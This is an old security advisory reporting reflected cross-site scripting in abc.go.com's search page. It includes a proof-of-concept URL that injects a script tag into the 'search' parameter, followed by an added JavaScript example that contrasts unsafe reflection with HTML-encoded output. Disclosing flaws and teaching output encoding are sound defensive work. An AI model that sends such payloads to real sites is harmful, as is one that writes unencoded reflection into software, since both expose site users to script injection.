ABC.go.com Cross Site Scripting

2011-08-02T00:00:00
ID PACKETSTORM:103631
Type packetstorm
Reporter Karthik R
Modified 2011-08-02T00:00:00

Description

                                        
                                            `  
abc.go.COM XSS vulnerability  
vendor: www.abc.go.com  
Author: Karthik R (3psil0nLambDa)  
Email: Karthik.cupid@gmail.com  
My blog: www.epsilonlambda.co.cc  
  
  
------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
* XSS vulnerability  
  
  
1. Demo iframe injection:  
http://abc.go.com/search?search=%22%3E%3Cscript%3Ealert%28%22hi%22%29;%3C/script%3E  
  
------------------------------------------------------------------------------------------------------------------------------------------------------------  
Thanks to side-effects and greets to r007ki7 and my love taashu.  
`
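
An added example (not part of the original advisory, and not the site's code) showing why the published `search` value runs as script when it is reflected unencoded, and how output encoding neutralises it. The `<input>` markup and all function names are assumptions, since the advisory does not show the page's HTML.

```javascript
// Constructed model of a search page that echoes the query back into its form.
// The markup below is an assumption; the advisory does not include the real HTML.

// PoC URL exactly as published in the advisory.
const POC_URL =
  'http://abc.go.com/search?search=%22%3E%3Cscript%3Ealert%28%22hi%22%29;%3C/script%3E';

// Extract the percent-decoded `search` parameter from a request URL.
function searchTerm(requestUrl) {
  return new URL(requestUrl).searchParams.get('search') ?? '';
}

// Encode the characters that are significant in HTML text and quoted attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: raw reflection into a double-quoted attribute.
// A leading `">` closes the attribute and the tag, so the rest is parsed as markup.
function renderUnsafe(term) {
  return `<input type="text" name="search" value="${term}">`;
}

// Hardened pattern: the same template with context-appropriate encoding.
function renderSafe(term) {
  return `<input type="text" name="search" value="${escapeHtml(term)}">`;
}

// True when the rendered markup contains a live <script> start tag.
function hasScriptElement(html) {
  return /<script\b/i.test(html);
}

// Render the advisory's PoC both ways and report the outcome.
function demo() {
  const term = searchTerm(POC_URL);
  return {
    decoded: term,
    unsafeExecutes: hasScriptElement(renderUnsafe(term)),
    safeExecutes: hasScriptElement(renderSafe(term)),
  };
}

console.log(demo());
```
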